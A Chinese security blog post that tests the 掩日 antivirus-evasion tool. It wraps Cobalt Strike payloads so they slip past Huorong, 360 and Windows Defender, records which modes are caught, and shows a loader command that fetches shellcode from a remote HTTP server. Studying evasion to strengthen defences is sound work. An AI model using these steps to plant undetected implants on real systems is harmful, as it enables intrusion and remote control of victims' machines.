新版掩日——免杀Windows Defender

2022-06-07 19:01:00 浏览数 (1)

乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

更新时间:2022.05.16

本文首发乌鸦安全知识星球

1. 介绍

掩日免杀是一个非常优秀的项目,目前在4月19号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:

代码语言:javascript复制
https://github.com/1y0n/av_evasion_tool

下载之后本地打开:(记得关闭杀软)

2. 环境配置

安装环境:Windows10虚拟机 在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gccgo的环境:

gcc安装

gcc --version

go安装

go version

3. 环境

在作者的介绍中,针对Cobalt Strike生成的木马要求:

针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。

因此在这里我们使用最常用的CS的木马来进行操作。

3.1 环境准备

在本地启动一个CS,服务端:

代码语言:javascript复制
sudo ./teamserver 10.30.1.147 123

启用客户端,并新增监听,在这里使用作者建议的HTTPS方式:

然后生成一个payload.c文件:

3.2 测试环境

测试机:

  • • Windows10 360主动防御
  • • Windows7 火绒主动防御
  • • Windows10 开启windows Defender

其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。

4. 免杀测试

4.1 通用免杀

在这里选择直接执行的方式,并且使用隐藏窗口的模式:

此时生成成功:

4.1.1 火绒(成功)

此时没有发现问题,上线测试:

4.1.2 360(成功)

关闭360的自动上传样本功能:

然后按位置扫描,没有发现问题:

上线测试下,此时上线正常:

4.1.3 Windows Defender(失败)

此时的 Windows Defender病毒库为最新版本:

静态测试
动态上线(被杀)

在上线之后,立刻被拦截查杀:

在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试:

在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。

4.1.4 强力模式(成功)

在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU

image.png

此时静态查杀,依旧正常

动态上线正常:

4.2 分离免杀

在这里执行的时候,会生成两个文件,一个是不含shellcodeshellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。

此时生成了两个文件:

静态查杀正常:

动态加载: 动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软)

当有Windows Defender的时候:

直接被动态查杀,再试试其他的方式,发现全部被杀

4.3 网络分离

将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务:

python3 -m http.server 802

然后在远程进行加载:

dUu.exe http://10.30.1.147:802/dUu.txt

还是被Windows Defender杀了:

5. 总结

在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone

0 人点赞